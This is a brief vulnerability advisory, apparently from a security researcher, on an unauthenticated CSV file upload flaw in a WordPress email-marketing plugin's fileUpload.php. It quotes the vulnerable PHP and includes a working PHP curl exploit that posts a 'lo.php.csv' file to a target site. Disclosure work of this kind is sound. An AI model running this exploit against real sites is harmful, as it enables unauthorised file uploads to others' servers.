Larry W. Cashdollar
3/28/2015

I'm not sure how useful this is, uploading a csv file:

./marketing/envialosimple-email-marketing-y-newsletters-gratis/php/fileUpload.php

The code below doesn't check for any authentication, only that the file extension is .csv.

<?php

// list of valid extensions, ex. array("jpeg", "xml", "bmp") $allowedExtensions = array("csv");

// max file size in bytes
$sizeLimit = 10 * 1024 * 1024;

require_once('qqUploadedFileXhr.php');

$uploader = new qqFileUploader($allowedExtensions, $sizeLimit);

// Call handleUpload() with the name of the folder, relative to PHP's getcwd() $result = $uploader->handleUpload('uploads/');

// to pass data through iframe you will need to encode all html tags echo htmlspecialchars(json_encode($result), ENT_NOQUOTES);

An exploit:
<?php

$uploadfile="lo.php.csv";
$ch = curl_init("http://target/wp-content/plugins/envialosimple-email-marketing-y-newsletters-gratis/php/fileUpload.php"); curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('qqfile'=>"@$uploadfile",'name'=>'lo.php.csv')); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>